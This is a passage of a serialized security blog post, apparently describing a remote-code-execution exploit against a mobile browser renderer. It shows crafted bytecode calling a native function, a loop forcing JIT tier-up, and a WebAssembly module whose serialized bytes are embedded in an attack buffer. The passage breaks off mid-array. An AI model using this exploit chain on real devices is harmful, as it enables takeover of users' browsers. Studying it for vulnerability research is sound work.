",{"type":24,"tag":145,"props":142858,"children":142860},{"className":142859},[],[142861],{"type":30,"value":139604},{"type":30,"value":206},{"type":24,"tag":291,"props":142864,"children":142866},{"code":142865,"language":3184,"meta":7,"className":3185,"style":7},"try {\n ${'a1 + 0xa931111;'.repeat(0x059301 - 1)}\n a1 + 0x03027a6c;\n throw 0x393e71a;\n} catch (e) {\n console.log(\"foo\");\n yield a16;\n}\n",[142867],{"type":24,"tag":145,"props":142868,"children":142869},{"__ignoreMap":7},[142870,142881,142925,142945,142961,142984,143011,143026],{"type":24,"tag":301,"props":142871,"children":142872},{"class":303,"line":304},[142873,142877],{"type":24,"tag":301,"props":142874,"children":142875},{"style":308},[142876],{"type":30,"value":55067},{"type":24,"tag":301,"props":142878,"children":142879},{"style":359},[142880],{"type":30,"value":3035},{"type":24,"tag":301,"props":142882,"children":142883},{"class":303,"line":320},[142884,142888,142892,142896,142900,142904,142908,142913,142917,142921],{"type":24,"tag":301,"props":142885,"children":142886},{"style":369},[142887],{"type":30,"value":139870},{"type":24,"tag":301,"props":142889,"children":142890},{"style":359},[142891],{"type":30,"value":83330},{"type":24,"tag":301,"props":142893,"children":142894},{"style":329},[142895],{"type":30,"value":139879},{"type":24,"tag":301,"props":142897,"children":142898},{"style":359},[142899],{"type":30,"value":206},{"type":24,"tag":301,"props":142901,"children":142902},{"style":314},[142903],{"type":30,"value":3394},{"type":24,"tag":301,"props":142905,"children":142906},{"style":359},[142907],{"type":30,"value":362},{"type":24,"tag":301,"props":142909,"children":142910},{"style":466},[142911],{"type":30,"value":142912},"0x059301",{"type":24,"tag":301,"props":142914,"children":142915},{"style":385},[142916],{"type":30,"value":3407},{"type":24,"tag":301,"props":142918,"children":142919},{"style":466},[142920],{"type":30,"value":487},{"type":24,"tag":301,"props":142922,"children":142923},{"style":359},[142924],{"type":30,"value":139909},{"type":24,"tag":301,"props":142926,"children":142927},{"class":303,"line":335},[142928,142932,142936,142941],{"type":24,"tag":301,"props":142929,"children":142930},{"style":369},[142931],{"type":30,"value":139917},{"type":24,"tag":301,"props":142933,"children":142934},{"style":385},[142935],{"type":30,"value":957},{"type":24,"tag":301,"props":142937,"children":142938},{"style":466},[142939],{"type":30,"value":142940}," 0x03027a6c",{"type":24,"tag":301,"props":142942,"children":142943},{"style":359},[142944],{"type":30,"value":492},{"type":24,"tag":301,"props":142946,"children":142947},{"class":303,"line":344},[142948,142952,142957],{"type":24,"tag":301,"props":142949,"children":142950},{"style":308},[142951],{"type":30,"value":41949},{"type":24,"tag":301,"props":142953,"children":142954},{"style":466},[142955],{"type":30,"value":142956}," 0x393e71a",{"type":24,"tag":301,"props":142958,"children":142959},{"style":359},[142960],{"type":30,"value":492},{"type":24,"tag":301,"props":142962,"children":142963},{"class":303,"line":401},[142964,142968,142972,142976,142980],{"type":24,"tag":301,"props":142965,"children":142966},{"style":359},[142967],{"type":30,"value":53610},{"type":24,"tag":301,"props":142969,"children":142970},{"style":308},[142971],{"type":30,"value":55146},{"type":24,"tag":301,"props":142973,"children":142974},{"style":359},[142975],{"type":30,"value":873},{"type":24,"tag":301,"props":142977,"children":142978},{"style":369},[142979],{"type":30,"value":58179},{"type":24,"tag":301,"props":142981,"children":142982},{"style":359},[142983],{"type":30,"value":398},{"type":24,"tag":301,"props":142985,"children":142986},{"class":303,"line":415},[142987,142991,142995,142999,143003,143007],{"type":24,"tag":301,"props":142988,"children":142989},{"style":369},[142990],{"type":30,"value":108640},{"type":24,"tag":301,"props":142992,"children":142993},{"style":359},[142994],{"type":30,"value":206},{"type":24,"tag":301,"props":142996,"children":142997},{"style":314},[142998],{"type":30,"value":108649},{"type":24,"tag":301,"props":143000,"children":143001},{"style":359},[143002],{"type":30,"value":362},{"type":24,"tag":301,"props":143004,"children":143005},{"style":329},[143006],{"type":30,"value":139993},{"type":24,"tag":301,"props":143008,"children":143009},{"style":359},[143010],{"type":30,"value":589},{"type":24,"tag":301,"props":143012,"children":143013},{"class":303,"line":439},[143014,143018,143022],{"type":24,"tag":301,"props":143015,"children":143016},{"style":308},[143017],{"type":30,"value":140005},{"type":24,"tag":301,"props":143019,"children":143020},{"style":369},[143021],{"type":30,"value":140010},{"type":24,"tag":301,"props":143023,"children":143024},{"style":359},[143025],{"type":30,"value":492},{"type":24,"tag":301,"props":143027,"children":143028},{"class":303,"line":447},[143029],{"type":24,"tag":301,"props":143030,"children":143031},{"style":359},[143032],{"type":30,"value":698},{"type":24,"tag":32,"props":143034,"children":143035},{},[143036,143038,143044,143046,143052,143054,143060,143062,143067,143069,143075,143077,143082,143083,143089],{"type":30,"value":143037},"Here, ",{"type":24,"tag":145,"props":143039,"children":143041},{"className":143040},[],[143042],{"type":30,"value":143043},"a1 + 0x03027a6c",{"type":30,"value":143045}," generates the bytes ",{"type":24,"tag":145,"props":143047,"children":143049},{"className":143048},[],[143050],{"type":30,"value":143051},"01 4b 6c 7a 02 03",{"type":30,"value":143053},", where ",{"type":24,"tag":145,"props":143055,"children":143057},{"className":143056},[],[143058],{"type":30,"value":143059},"0x6c",{"type":30,"value":143061}," is the ",{"type":24,"tag":145,"props":143063,"children":143065},{"className":143064},[],[143066],{"type":30,"value":139588},{"type":30,"value":143068}," opcode, ",{"type":24,"tag":145,"props":143070,"children":143072},{"className":143071},[],[143073],{"type":30,"value":143074},"0x027a",{"type":30,"value":143076}," is the function ID of ",{"type":24,"tag":145,"props":143078,"children":143080},{"className":143079},[],[143081],{"type":30,"value":139630},{"type":30,"value":8410},{"type":24,"tag":145,"props":143084,"children":143086},{"className":143085},[],[143087],{"type":30,"value":143088},"0x03",{"type":30,"value":143090}," is the register index holding its first argument.",{"type":24,"tag":32,"props":143092,"children":143093},{},[143094,143096,143101,143102,143107,143109,143114],{"type":30,"value":143095},"Our earlier javascript snippet that serialized the wasm module used two native calls: ",{"type":24,"tag":145,"props":143097,"children":143099},{"className":143098},[],[143100],{"type":30,"value":139630},{"type":30,"value":2378},{"type":24,"tag":145,"props":143103,"children":143105},{"className":143104},[],[143106],{"type":30,"value":140596},{"type":30,"value":143108},". To avoid patching the bytecode again to invoke ",{"type":24,"tag":145,"props":143110,"children":143112},{"className":143111},[],[143113],{"type":30,"value":140596},{"type":30,"value":143115},", we can force Turbofan to compile the target function like this:",{"type":24,"tag":291,"props":143117,"children":143119},{"code":143118,"language":3184,"meta":7,"className":3185,"style":7},"// %WasmTierUpFunction(func);\nfor (let i = 0; i \u003C 0x100000; i++) {\n func();\n}\n",[143120],{"type":24,"tag":145,"props":143121,"children":143122},{"__ignoreMap":7},[143123,143131,143191,143203],{"type":24,"tag":301,"props":143124,"children":143125},{"class":303,"line":304},[143126],{"type":24,"tag":301,"props":143127,"children":143128},{"style":1062},[143129],{"type":30,"value":143130},"// %WasmTierUpFunction(func);\n",{"type":24,"tag":301,"props":143132,"children":143133},{"class":303,"line":320},[143134,143138,143142,143146,143150,143154,143158,143162,143166,143170,143175,143179,143183,143187],{"type":24,"tag":301,"props":143135,"children":143136},{"style":308},[143137],{"type":30,"value":10220},{"type":24,"tag":301,"props":143139,"children":143140},{"style":359},[143141],{"type":30,"value":873},{"type":24,"tag":301,"props":143143,"children":143144},{"style":348},[143145],{"type":30,"value":3258},{"type":24,"tag":301,"props":143147,"children":143148},{"style":369},[143149],{"type":30,"value":10225},{"type":24,"tag":301,"props":143151,"children":143152},{"style":385},[143153],{"type":30,"value":2537},{"type":24,"tag":301,"props":143155,"children":143156},{"style":466},[143157],{"type":30,"value":685},{"type":24,"tag":301,"props":143159,"children":143160},{"style":359},[143161],{"type":30,"value":3940},{"type":24,"tag":301,"props":143163,"children":143164},{"style":369},[143165],{"type":30,"value":10564},{"type":24,"tag":301,"props":143167,"children":143168},{"style":385},[143169],{"type":30,"value":3950},{"type":24,"tag":301,"props":143171,"children":143172},{"style":466},[143173],{"type":30,"value":143174}," 0x100000",{"type":24,"tag":301,"props":143176,"children":143177},{"style":359},[143178],{"type":30,"value":3940},{"type":24,"tag":301,"props":143180,"children":143181},{"style":369},[143182],{"type":30,"value":10564},{"type":24,"tag":301,"props":143184,"children":143185},{"style":385},[143186],{"type":30,"value":1859},{"type":24,"tag":301,"props":143188,"children":143189},{"style":359},[143190],{"type":30,"value":398},{"type":24,"tag":301,"props":143192,"children":143193},{"class":303,"line":335},[143194,143199],{"type":24,"tag":301,"props":143195,"children":143196},{"style":314},[143197],{"type":30,"value":143198}," func",{"type":24,"tag":301,"props":143200,"children":143201},{"style":359},[143202],{"type":30,"value":4859},{"type":24,"tag":301,"props":143204,"children":143205},{"class":303,"line":344},[143206],{"type":24,"tag":301,"props":143207,"children":143208},{"style":359},[143209],{"type":30,"value":698},{"type":24,"tag":32,"props":143211,"children":143212},{},[143213],{"type":30,"value":143214},"Finally, running this code on the device:",{"type":24,"tag":291,"props":143216,"children":143218},{"code":143217,"language":3184,"meta":7,"className":3185,"style":7},"(async () => {\n var wasm_code = new Uint8Array([\n 0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n 0, 0, 10, 4, 1, 2, 0, 11,\n ]);\n var mod = new WebAssembly.Module(wasm_code);\n var inst = new WebAssembly.Instance(mod);\n var func = inst.exports.shell;\n\n // %WasmTierUpFunction(func);\n for (let i = 0; i \u003C 0x100000; i++) {\n func();\n }\n\n let r = bug(mod);\n result = (await r.next()).value;\n console.log(result);\n\n let result_bytes = new Uint8Array(result);\n console.log('[' + result_bytes.join(', ') + ']');\n})();\n",[143219],{"type":24,"tag":145,"props":143220,"children":143221},{"__ignoreMap":7},[143222,143245,143273,143492,143559,143566,143609,143652,143691,143698,143706,143766,143778,143785,143792,143823,143866,143893,143900,143936,143999],{"type":24,"tag":301,"props":143223,"children":143224},{"class":303,"line":304},[143225,143229,143233,143237,143241],{"type":24,"tag":301,"props":143226,"children":143227},{"style":359},[143228],{"type":30,"value":362},{"type":24,"tag":301,"props":143230,"children":143231},{"style":348},[143232],{"type":30,"value":4919},{"type":24,"tag":301,"props":143234,"children":143235},{"style":359},[143236],{"type":30,"value":46432},{"type":24,"tag":301,"props":143238,"children":143239},{"style":348},[143240],{"type":30,"value":4841},{"type":24,"tag":301,"props":143242,"children":143243},{"style":359},[143244],{"type":30,"value":3035},{"type":24,"tag":301,"props":143246,"children":143247},{"class":303,"line":320},[143248,143253,143257,143261,143265,143269],{"type":24,"tag":301,"props":143249,"children":143250},{"style":348},[143251],{"type":30,"value":143252}," var",{"type":24,"tag":301,"props":143254,"children":143255},{"style":369},[143256],{"type":30,"value":140126},{"type":24,"tag":301,"props":143258,"children":143259},{"style":385},[143260],{"type":30,"value":2537},{"type":24,"tag":301,"props":143262,"children":143263},{"style":348},[143264],{"type":30,"value":38685},{"type":24,"tag":301,"props":143266,"children":143267},{"style":314},[143268],{"type":30,"value":140139},{"type":24,"tag":301,"props":143270,"children":143271},{"style":359},[143272],{"type":30,"value":140144},{"type":24,"tag":301,"props":143274,"children":143275},{"class":303,"line":335},[143276,143280,143284,143288,143292,143296,143300,143304,143308,143312,143316,143320,143324,143328,143332,143336,143340,143344,143348,143352,143356,143360,143364,143368,143372,143376,143380,143384,143388,143392,143396,143400,143404,143408,143412,143416,143420,143424,143428,143432,143436,143440,143444,143448,143452,143456,143460,143464,143468,143472,143476,143480,143484,143488],{"type":24,"tag":301,"props":143277,"children":143278},{"style":466},[143279],{"type":30,"value":140869},{"type":24,"tag":301,"props":143281,"children":143282},{"style":359},[143283],{"type":30,"value":377},{"type":24,"tag":301,"props":143285,"children":143286},{"style":466},[143287],{"type":30,"value":140161},{"type":24,"tag":301,"props":143289,"children":143290},{"style":359},[143291],{"type":30,"value":377},{"type":24,"tag":301,"props":143293,"children":143294},{"style":466},[143295],{"type":30,"value":140170},{"type":24,"tag":301,"props":143297,"children":143298},{"style":359},[143299],{"type":30,"value":377},{"type":24,"tag":301,"props":143301,"children":143302},{"style":466},[143303],{"type":30,"value":140179},{"type":24,"tag":301,"props":143305,"children":143306},{"style":359},[143307],{"type":30,"value":377},{"type":24,"tag":301,"props":143309,"children":143310},{"style":466},[143311],{"type":30,"value":546},{"type":24,"tag":301,"props":143313,"children":143314},{"style":359},[143315],{"type":30,"value":377},{"type":24,"tag":301,"props":143317,"children":143318},{"style":466},[143319],{"type":30,"value":584},{"type":24,"tag":301,"props":143321,"children":143322},{"style":359},[143323],{"type":30,"value":377},{"type":24,"tag":301,"props":143325,"children":143326},{"style":466},[143327],{"type":30,"value":584},{"type":24,"tag":301,"props":143329,"children":143330},{"style":359},[143331],{"type":30,"value":377},{"type":24,"tag":301,"props":143333,"children":143334},{"style":466},[143335],{"type":30,"value":584},{"type":24,"tag":301,"props":143337,"children":143338},{"style":359},[143339],{"type":30,"value":377},{"type":24,"tag":301,"props":143341,"children":143342},{"style":466},[143343],{"type":30,"value":546},{"type":24,"tag":301,"props":143345,"children":143346},{"style":359},[143347],{"type":30,"value":377},{"type":24,"tag":301,"props":143349,"children":143350},{"style":466},[143351],{"type":30,"value":1761},{"type":24,"tag":301,"props":143353,"children":143354},{"style":359},[143355],{"type":30,"value":377},{"type":24,"tag":301,"props":143357,"children":143358},{"style":466},[143359],{"type":30,"value":546},{"type":24,"tag":301,"props":143361,"children":143362},{"style":359},[143363],{"type":30,"value":377},{"type":24,"tag":301,"props":143365,"children":143366},{"style":466},[143367],{"type":30,"value":140244},{"type":24,"tag":301,"props":143369,"children":143370},{"style":359},[143371],{"type":30,"value":377},{"type":24,"tag":301,"props":143373,"children":143374},{"style":466},[143375],{"type":30,"value":584},{"type":24,"tag":301,"props":143377,"children":143378},{"style":359},[143379],{"type":30,"value":377},{"type":24,"tag":301,"props":143381,"children":143382},{"style":466},[143383],{"type":30,"value":584},{"type":24,"tag":301,"props":143385,"children":143386},{"style":359},[143387],{"type":30,"value":377},{"type":24,"tag":301,"props":143389,"children":143390},{"style":466},[143391],{"type":30,"value":1447},{"type":24,"tag":301,"props":143393,"children":143394},{"style":359},[143395],{"type":30,"value":377},{"type":24,"tag":301,"props":143397,"children":143398},{"style":466},[143399],{"type":30,"value":1503},{"type":24,"tag":301,"props":143401,"children":143402},{"style":359},[143403],{"type":30,"value":377},{"type":24,"tag":301,"props":143405,"children":143406},{"style":466},[143407],{"type":30,"value":546},{"type":24,"tag":301,"props":143409,"children":143410},{"style":359},[143411],{"type":30,"value":377},{"type":24,"tag":301,"props":143413,"children":143414},{"style":466},[143415],{"type":30,"value":584},{"type":24,"tag":301,"props":143417,"children":143418},{"style":359},[143419],{"type":30,"value":377},{"type":24,"tag":301,"props":143421,"children":143422},{"style":466},[143423],{"type":30,"value":61393},{"type":24,"tag":301,"props":143425,"children":143426},{"style":359},[143427],{"type":30,"value":377},{"type":24,"tag":301,"props":143429,"children":143430},{"style":466},[143431],{"type":30,"value":62606},{"type":24,"tag":301,"props":143433,"children":143434},{"style":359},[143435],{"type":30,"value":377},{"type":24,"tag":301,"props":143437,"children":143438},{"style":466},[143439],{"type":30,"value":546},{"type":24,"tag":301,"props":143441,"children":143442},{"style":359},[143443],{"type":30,"value":377},{"type":24,"tag":301,"props":143445,"children":143446},{"style":466},[143447],{"type":30,"value":24886},{"type":24,"tag":301,"props":143449,"children":143450},{"style":359},[143451],{"type":30,"value":377},{"type":24,"tag":301,"props":143453,"children":143454},{"style":466},[143455],{"type":30,"value":140170},{"type":24,"tag":301,"props":143457,"children":143458},{"style":359},[143459],{"type":30,"value":377},{"type":24,"tag":301,"props":143461,"children":143462},{"style":466},[143463],{"type":30,"value":140341},{"type":24,"tag":301,"props":143465,"children":143466},{"style":359},[143467],{"type":30,"value":377},{"type":24,"tag":301,"props":143469,"children":143470},{"style":466},[143471],{"type":30,"value":140350},{"type":24,"tag":301,"props":143473,"children":143474},{"style":359},[143475],{"type":30,"value":377},{"type":24,"tag":301,"props":143477,"children":143478},{"style":466},[143479],{"type":30,"value":140359},{"type":24,"tag":301,"props":143481,"children":143482},{"style":359},[143483],{"type":30,"value":377},{"type":24,"tag":301,"props":143485,"children":143486},{"style":466},[143487],{"type":30,"value":140359},{"type":24,"tag":301,"props":143489,"children":143490},{"style":359},[143491],{"type":30,"value":1729},{"type":24,"tag":301,"props":143493,"children":143494},{"class":303,"line":344},[143495,143499,143503,143507,143511,143515,143519,143523,143527,143531,143535,143539,143543,143547,143551,143555],{"type":24,"tag":301,"props":143496,"children":143497},{"style":466},[143498],{"type":30,"value":140869},{"type":24,"tag":301,"props":143500,"children":143501},{"style":359},[143502],{"type":30,"value":377},{"type":24,"tag":301,"props":143504,"children":143505},{"style":466},[143506],{"type":30,"value":584},{"type":24,"tag":301,"props":143508,"children":143509},{"style":359},[143510],{"type":30,"value":377},{"type":24,"tag":301,"props":143512,"children":143513},{"style":466},[143514],{"type":30,"value":9505},{"type":24,"tag":301,"props":143516,"children":143517},{"style":359},[143518],{"type":30,"value":377},{"type":24,"tag":301,"props":143520,"children":143521},{"style":466},[143522],{"type":30,"value":1761},{"type":24,"tag":301,"props":143524,"children":143525},{"style":359},[143526],{"type":30,"value":377},{"type":24,"tag":301,"props":143528,"children":143529},{"style":466},[143530],{"type":30,"value":546},{"type":24,"tag":301,"props":143532,"children":143533},{"style":359},[143534],{"type":30,"value":377},{"type":24,"tag":301,"props":143536,"children":143537},{"style":466},[143538],{"type":30,"value":1503},{"type":24,"tag":301,"props":143540,"children":143541},{"style":359},[143542],{"type":30,"value":377},{"type":24,"tag":301,"props":143544,"children":143545},{"style":466},[143546],{"type":30,"value":584},{"type":24,"tag":301,"props":143548,"children":143549},{"style":359},[143550],{"type":30,"value":377},{"type":24,"tag":301,"props":143552,"children":143553},{"style":466},[143554],{"type":30,"value":140435},{"type":24,"tag":301,"props":143556,"children":143557},{"style":359},[143558],{"type":30,"value":1729},{"type":24,"tag":301,"props":143560,"children":143561},{"class":303,"line":401},[143562],{"type":24,"tag":301,"props":143563,"children":143564},{"style":359},[143565],{"type":30,"value":141156},{"type":24,"tag":301,"props":143567,"children":143568},{"class":303,"line":415},[143569,143573,143577,143581,143585,143589,143593,143597,143601,143605],{"type":24,"tag":301,"props":143570,"children":143571},{"style":348},[143572],{"type":30,"value":143252},{"type":24,"tag":301,"props":143574,"children":143575},{"style":369},[143576],{"type":30,"value":78336},{"type":24,"tag":301,"props":143578,"children":143579},{"style":385},[143580],{"type":30,"value":2537},{"type":24,"tag":301,"props":143582,"children":143583},{"style":348},[143584],{"type":30,"value":38685},{"type":24,"tag":301,"props":143586,"children":143587},{"style":369},[143588],{"type":30,"value":140470},{"type":24,"tag":301,"props":143590,"children":143591},{"style":359},[143592],{"type":30,"value":206},{"type":24,"tag":301,"props":143594,"children":143595},{"style":314},[143596],{"type":30,"value":92622},{"type":24,"tag":301,"props":143598,"children":143599},{"style":359},[143600],{"type":30,"value":362},{"type":24,"tag":301,"props":143602,"children":143603},{"style":369},[143604],{"type":30,"value":140487},{"type":24,"tag":301,"props":143606,"children":143607},{"style":359},[143608],{"type":30,"value":589},{"type":24,"tag":301,"props":143610,"children":143611},{"class":303,"line":439},[143612,143616,143620,143624,143628,143632,143636,143640,143644,143648],{"type":24,"tag":301,"props":143613,"children":143614},{"style":348},[143615],{"type":30,"value":143252},{"type":24,"tag":301,"props":143617,"children":143618},{"style":369},[143619],{"type":30,"value":140503},{"type":24,"tag":301,"props":143621,"children":143622},{"style":385},[143623],{"type":30,"value":2537},{"type":24,"tag":301,"props":143625,"children":143626},{"style":348},[143627],{"type":30,"value":38685},{"type":24,"tag":301,"props":143629,"children":143630},{"style":369},[143631],{"type":30,"value":140470},{"type":24,"tag":301,"props":143633,"children":143634},{"style":359},[143635],{"type":30,"value":206},{"type":24,"tag":301,"props":143637,"children":143638},{"style":314},[143639],{"type":30,"value":140524},{"type":24,"tag":301,"props":143641,"children":143642},{"style":359},[143643],{"type":30,"value":362},{"type":24,"tag":301,"props":143645,"children":143646},{"style":369},[143647],{"type":30,"value":140533},{"type":24,"tag":301,"props":143649,"children":143650},{"style":359},[143651],{"type":30,"value":589},{"type":24,"tag":301,"props":143653,"children":143654},{"class":303,"line":447},[143655,143659,143663,143667,143671,143675,143679,143683,143687],{"type":24,"tag":301,"props":143656,"children":143657},{"style":348},[143658],{"type":30,"value":143252},{"type":24,"tag":301,"props":143660,"children":143661},{"style":369},[143662],{"type":30,"value":86721},{"type":24,"tag":301,"props":143664,"children":143665},{"style":385},[143666],{"type":30,"value":2537},{"type":24,"tag":301,"props":143668,"children":143669},{"style":369},[143670],{"type":30,"value":140503},{"type":24,"tag":301,"props":143672,"children":143673},{"style":359},[143674],{"type":30,"value":206},{"type":24,"tag":301,"props":143676,"children":143677},{"style":369},[143678],{"type":30,"value":44625},{"type":24,"tag":301,"props":143680,"children":143681},{"style":359},[143682],{"type":30,"value":206},{"type":24,"tag":301,"props":143684,"children":143685},{"style":369},[143686],{"type":30,"value":140573},{"type":24,"tag":301,"props":143688,"children":143689},{"style":359},[143690],{"type":30,"value":492},{"type":24,"tag":301,"props":143692,"children":143693},{"class":303,"line":476},[143694],{"type":24,"tag":301,"props":143695,"children":143696},{"emptyLinePlaceholder":16},[143697],{"type":30,"value":341},{"type":24,"tag":301,"props":143699,"children":143700},{"class":303,"line":495},[143701],{"type":24,"tag":301,"props":143702,"children":143703},{"style":1062},[143704],{"type":30,"value":143705}," // %WasmTierUpFunction(func);\n",{"type":24,"tag":301,"props":143707,"children":143708},{"class":303,"line":504},[143709,143714,143718,143722,143726,143730,143734,143738,143742,143746,143750,143754,143758,143762],{"type":24,"tag":301,"props":143710,"children":143711},{"style":308},[143712],{"type":30,"value":143713}," for",{"type":24,"tag":301,"props":143715,"children":143716},{"style":359},[143717],{"type":30,"value":873},{"type":24,"tag":301,"props":143719,"children":143720},{"style":348},[143721],{"type":30,"value":3258},{"type":24,"tag":301,"props":143723,"children":143724},{"style":369},[143725],{"type":30,"value":10225},{"type":24,"tag":301,"props":143727,"children":143728},{"style":385},[143729],{"type":30,"value":2537},{"type":24,"tag":301,"props":143731,"children":143732},{"style":466},[143733],{"type":30,"value":685},{"type":24,"tag":301,"props":143735,"children":143736},{"style":359},[143737],{"type":30,"value":3940},{"type":24,"tag":301,"props":143739,"children":143740},{"style":369},[143741],{"type":30,"value":10564},{"type":24,"tag":301,"props":143743,"children":143744},{"style":385},[143745],{"type":30,"value":3950},{"type":24,"tag":301,"props":143747,"children":143748},{"style":466},[143749],{"type":30,"value":143174},{"type":24,"tag":301,"props":143751,"children":143752},{"style":359},[143753],{"type":30,"value":3940},{"type":24,"tag":301,"props":143755,"children":143756},{"style":369},[143757],{"type":30,"value":10564},{"type":24,"tag":301,"props":143759,"children":143760},{"style":385},[143761],{"type":30,"value":1859},{"type":24,"tag":301,"props":143763,"children":143764},{"style":359},[143765],{"type":30,"value":398},{"type":24,"tag":301,"props":143767,"children":143768},{"class":303,"line":512},[143769,143774],{"type":24,"tag":301,"props":143770,"children":143771},{"style":314},[143772],{"type":30,"value":143773}," func",{"type":24,"tag":301,"props":143775,"children":143776},{"style":359},[143777],{"type":30,"value":4859},{"type":24,"tag":301,"props":143779,"children":143780},{"class":303,"line":592},[143781],{"type":24,"tag":301,"props":143782,"children":143783},{"style":359},[143784],{"type":30,"value":6918},{"type":24,"tag":301,"props":143786,"children":143787},{"class":303,"line":619},[143788],{"type":24,"tag":301,"props":143789,"children":143790},{"emptyLinePlaceholder":16},[143791],{"type":30,"value":341},{"type":24,"tag":301,"props":143793,"children":143794},{"class":303,"line":635},[143795,143799,143803,143807,143811,143815,143819],{"type":24,"tag":301,"props":143796,"children":143797},{"style":348},[143798],{"type":30,"value":14671},{"type":24,"tag":301,"props":143800,"children":143801},{"style":369},[143802],{"type":30,"value":142608},{"type":24,"tag":301,"props":143804,"children":143805},{"style":385},[143806],{"type":30,"value":2537},{"type":24,"tag":301,"props":143808,"children":143809},{"style":314},[143810],{"type":30,"value":142617},{"type":24,"tag":301,"props":143812,"children":143813},{"style":359},[143814],{"type":30,"value":362},{"type":24,"tag":301,"props":143816,"children":143817},{"style":369},[143818],{"type":30,"value":140533},{"type":24,"tag":301,"props":143820,"children":143821},{"style":359},[143822],{"type":30,"value":589},{"type":24,"tag":301,"props":143824,"children":143825},{"class":303,"line":643},[143826,143830,143834,143838,143842,143846,143850,143854,143858,143862],{"type":24,"tag":301,"props":143827,"children":143828},{"style":369},[143829],{"type":30,"value":142653},{"type":24,"tag":301,"props":143831,"children":143832},{"style":385},[143833],{"type":30,"value":2537},{"type":24,"tag":301,"props":143835,"children":143836},{"style":359},[143837],{"type":30,"value":873},{"type":24,"tag":301,"props":143839,"children":143840},{"style":308},[143841],{"type":30,"value":39666},{"type":24,"tag":301,"props":143843,"children":143844},{"style":369},[143845],{"type":30,"value":142608},{"type":24,"tag":301,"props":143847,"children":143848},{"style":359},[143849],{"type":30,"value":206},{"type":24,"tag":301,"props":143851,"children":143852},{"style":314},[143853],{"type":30,"value":64283},{"type":24,"tag":301,"props":143855,"children":143856},{"style":359},[143857],{"type":30,"value":142682},{"type":24,"tag":301,"props":143859,"children":143860},{"style":369},[143861],{"type":30,"value":5958},{"type":24,"tag":301,"props":143863,"children":143864},{"style":359},[143865],{"type":30,"value":492},{"type":24,"tag":301,"props":143867,"children":143868},{"class":303,"line":652},[143869,143873,143877,143881,143885,143889],{"type":24,"tag":301,"props":143870,"children":143871},{"style":369},[143872],{"type":30,"value":108640},{"type":24,"tag":301,"props":143874,"children":143875},{"style":359},[143876],{"type":30,"value":206},{"type":24,"tag":301,"props":143878,"children":143879},{"style":314},[143880],{"type":30,"value":108649},{"type":24,"tag":301,"props":143882,"children":143883},{"style":359},[143884],{"type":30,"value":362},{"type":24,"tag":301,"props":143886,"children":143887},{"style":369},[143888],{"type":30,"value":5599},{"type":24,"tag":301,"props":143890,"children":143891},{"style":359},[143892],{"type":30,"value":589},{"type":24,"tag":301,"props":143894,"children":143895},{"class":303,"line":666},[143896],{"type":24,"tag":301,"props":143897,"children":143898},{"emptyLinePlaceholder":16},[143899],{"type":30,"value":341},{"type":24,"tag":301,"props":143901,"children":143902},{"class":303,"line":674},[143903,143907,143912,143916,143920,143924,143928,143932],{"type":24,"tag":301,"props":143904,"children":143905},{"style":348},[143906],{"type":30,"value":14671},{"type":24,"tag":301,"props":143908,"children":143909},{"style":369},[143910],{"type":30,"value":143911}," result_bytes",{"type":24,"tag":301,"props":143913,"children":143914},{"style":385},[143915],{"type":30,"value":2537},{"type":24,"tag":301,"props":143917,"children":143918},{"style":348},[143919],{"type":30,"value":38685},{"type":24,"tag":301,"props":143921,"children":143922},{"style":314},[143923],{"type":30,"value":140139},{"type":24,"tag":301,"props":143925,"children":143926},{"style":359},[143927],{"type":30,"value":362},{"type":24,"tag":301,"props":143929,"children":143930},{"style":369},[143931],{"type":30,"value":5599},{"type":24,"tag":301,"props":143933,"children":143934},{"style":359},[143935],{"type":30,"value":589},{"type":24,"tag":301,"props":143937,"children":143938},{"class":303,"line":692},[143939,143943,143947,143951,143955,143959,143963,143967,143971,143975,143979,143983,143987,143991,143995],{"type":24,"tag":301,"props":143940,"children":143941},{"style":369},[143942],{"type":30,"value":108640},{"type":24,"tag":301,"props":143944,"children":143945},{"style":359},[143946],{"type":30,"value":206},{"type":24,"tag":301,"props":143948,"children":143949},{"style":314},[143950],{"type":30,"value":108649},{"type":24,"tag":301,"props":143952,"children":143953},{"style":359},[143954],{"type":30,"value":362},{"type":24,"tag":301,"props":143956,"children":143957},{"style":329},[143958],{"type":30,"value":140706},{"type":24,"tag":301,"props":143960,"children":143961},{"style":385},[143962],{"type":30,"value":957},{"type":24,"tag":301,"props":143964,"children":143965},{"style":369},[143966],{"type":30,"value":143911},{"type":24,"tag":301,"props":143968,"children":143969},{"style":359},[143970],{"type":30,"value":206},{"type":24,"tag":301,"props":143972,"children":143973},{"style":314},[143974],{"type":30,"value":140723},{"type":24,"tag":301,"props":143976,"children":143977},{"style":359},[143978],{"type":30,"value":362},{"type":24,"tag":301,"props":143980,"children":143981},{"style":329},[143982],{"type":30,"value":140732},{"type":24,"tag":301,"props":143984,"children":143985},{"style":359},[143986],{"type":30,"value":911},{"type":24,"tag":301,"props":143988,"children":143989},{"style":385},[143990],{"type":30,"value":11206},{"type":24,"tag":301,"props":143992,"children":143993},{"style":329},[143994],{"type":30,"value":140745},{"type":24,"tag":301,"props":143996,"children":143997},{"style":359},[143998],{"type":30,"value":589},{"type":24,"tag":301,"props":144000,"children":144001},{"class":303,"line":3631},[144002],{"type":24,"tag":301,"props":144003,"children":144004},{"style":359},[144005],{"type":30,"value":108681},{"type":24,"tag":32,"props":144007,"children":144008},{},[144009],{"type":30,"value":144010},"We get the serialized bytes:",{"type":24,"tag":32,"props":144012,"children":144013},{},[144014],{"type":24,"tag":177,"props":144015,"children":144018},{"alt":144016,"src":144017},"image2","/posts/mobile-renderer-rce/image2.png",[],{"type":24,"tag":32,"props":144020,"children":144021},{},[144022,144024,144029],{"type":30,"value":144023},"We can now embed this output into the original bytecode that calls ",{"type":24,"tag":145,"props":144025,"children":144027},{"className":144026},[],[144028],{"type":30,"value":139604},{"type":30,"value":1679},{"type":24,"tag":291,"props":144031,"children":144033},{"code":144032,"language":3184,"meta":7,"className":3185,"style":7},"(async () => {\n const wasm_code = new Uint8Array([\n 0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n 0, 0, 10, 4, 1, 2, 0, 11,\n ]);\n const buffer = new Uint8Array([\n 146, 6, 222, 192, 174, 122, 171, 151, 31, 0, 0, 0, 39, 61, 60, 31, 0, 16, 3, 0, 0, 0, 0, 0, 64,\n 0, 